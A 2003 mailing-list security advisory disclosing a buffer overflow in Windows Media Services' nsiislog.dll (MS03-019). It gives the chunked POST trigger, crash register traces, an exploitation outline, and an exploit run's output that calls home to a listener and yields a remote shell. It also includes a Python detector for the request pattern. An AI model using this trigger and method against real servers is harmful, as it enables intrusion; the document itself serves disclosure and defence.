Windows Media Services Remote Command Execution

From: Brett Moore (brett_at_SOFTWARECREATIONS.CO.NZ)
Date: 05/31/03

    Date:         Sat, 31 May 2003 12:26:27 +1200
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    ========================================================================
    = Windows Media Services Remote Command Execution
    =
    = NSIISLOG.DLL Ver 4.1.0.3920
    =
    = MS Bulletin posted: May 28, 2003 revised May 30, 2003
    = http://www.microsoft.com/technet/security/bulletin/MS03-019.asp
    =
    = Affected Software:
    = Microsoft Windows NT 4.0
    = Microsoft Windows 2000
    =
    = Public disclosure on May 30, 2003
    ========================================================================

    A long time ago, in a place far far away....

    Well actually it was four months ago over here in New Zealand. Christmas
    holidays had finished and I was half way through contemplating writing
    a paper entitled 'The Methodical Approach To Finding Overflows'.

    I thought I had better try out the concept behind this approach and the
    issues discovered in nsiislog.dll are some of the results of it.

    == MS03-019 states ==
    Impact: Allow an attacker to execute code of their choice
    Max Risk: Important

    There is a flaw in the way in which nsiislog.dll processes incoming
    requests. A vulnerability exists because an attacker could send specially
    formed communications to the server that could cause IIS to stop responding
    to Internet requests.

    The vulnerability results because of an unchecked buffer used by the
    nsiislog.dll file for logging. If a specially crafted request is sent to the
    server, the logging file will attempt to write a larger buffer than is
    possible, which then in turn causes the IIS service to fail.
    == MS03-019 ==

    == Description ==

    Sending a chunked encoded post to nsiislog.dll will cause an access
    violation resulting in the following error log.

    ------------------------------------------------------------------------
    Event Type: Warning
    Event Source: W3SVC
    Event Category: None
    Event ID: 37
    Description:
    Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
    ------------------------------------------------------------------------

    A chunked encoded post will result in the control of EAX and ECX, with
    the exception occurring at a mov dword ptr [ecx],eax instruction.

    This allows remote command execution with privileges associated with the
    IWAM_machinename account.

    == Chunked Transfer-Encoding Post ==

    POST /scripts/nsiislog.dll HTTP/1.1
    Transfer-Encoding: chunked

    PostLength
    PostData
    0

    Using Size: 121
    Connecting....Sending Buffer....
    78003F25 dec dword ptr [ecx+0ACh]
    -
    7800F5ED dec dword ptr [esi] ESI = 58585858

    Using Size: 510
    Connecting....Sending Buffer....
    77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
                                                    ECX = 58585858

    Using Size: 5000
    Connecting....Sending Buffer....
    40F01DCC rep movs dword ptr [edi],dword ptr [esi]
    -
    77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
                                                    ECX = 58585858
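    The request shape above, as an added detection helper that is not part of the advisory: it parses a raw HTTP/1.1 request, decodes the chunked body (hex size, CRLF, data, CRLF, terminated by a zero-size chunk) and flags a chunked POST aimed at nsiislog.dll. The sample request is constructed here and reuses the advisory's 121-byte size (0x79).

```python
import re

# The vulnerable ISAPI extension named in the advisory, matched on the path only.
NSIISLOG_RE = re.compile(r"/nsiislog\.dll$", re.IGNORECASE)


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers, body); keys are lowercased bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    path = target.split(b"?", 1)[0].decode("latin-1")  # drop any query string
    return method.decode("latin-1"), path, headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode a chunked body: <hex size>CRLF<data>CRLF ... 0CRLF CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)  # ValueError if the size line never ends
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2  # step over the data and its trailing CRLF


def inspect(raw: bytes) -> dict:
    """Report whether a request matches the MS03-019 trigger pattern."""
    method, path, headers, body = parse_request(raw)
    chunked = b"chunked" in headers.get(b"transfer-encoding", b"").lower()
    try:
        payload, malformed = (decode_chunked(body) if chunked else body), False
    except ValueError:  # a bad size line or truncated chunk is itself worth logging
        payload, malformed = body, True
    targets = bool(NSIISLOG_RE.search(path))
    return {"targets_nsiislog": targets, "chunked": chunked, "malformed": malformed,
            "body_len": len(payload), "flag": method == "POST" and chunked and targets}


# Constructed sample: the advisory's 121-byte (0x79) case sent as one chunk.
SAMPLE = (b"POST /scripts/nsiislog.dll HTTP/1.1\r\nHost: target\r\n"
          b"Transfer-Encoding: chunked\r\n\r\n79\r\n" + b"X" * 121 + b"\r\n0\r\n\r\n")

if __name__ == "__main__":
    print(inspect(SAMPLE))
```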

    == Exploitation ==

    The infamous 'mov dword ptr [ecx],eax' which allows an attacker to take
    control by placing a value into a position that is later retrieved for the
    EIP register.

    In this case the exception was handled internally so execution flow could
    not be obtained by taking advantage of SEH, but we were successful in
    obtaining control by overwriting a portion of another 3 letter acronym.

    == Exploit Example ==

    %:\>exploit 192.168.1.63
    ** IISNSLOG.DLL - 4.1.0.3920 - Remote Shell **

    . Calling Home: blackhole:2000
    . Using: 0x########h as ABC overwrite
    . Using: 0x########h as direct jump location
    . Shellcode Size: 322 bytes
    . Preparing Exploit Buffer......Ready
    . Starting Listener On Port: 2000
    . Connecting To Target
    . Sending Exploit......Exploit Sent
    . Connection Received
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    C:\WINNT\system32>whoami
    IWAM_BLACKHOLE
    C:\WINNT\system32>

    == Solutions ==

    - Every day can be a 0-day day on the Internet. Limiting the avenues of
      attack can be a key factor in reducing the risk to a web server. Programs
      such as secureIIS and URLscan should be set up to reduce the number of
      methods that can be used to send data to a server. Removing unnecessary
      services, files and isapi extensions reduces the number of listeners
      that data can be fed to, limiting the number of vulnerabilities that a
      server is susceptible to.
    - Install the vendor supplied patch.

    == Credit ==

    Discovered and advised to Microsoft January 27, 2003 by Brett Moore.

    %-) shutz to: eEye, spyrit and all kiwis with hackfu
    %-) ha. we'll just say: "All of your livers are belong to us".


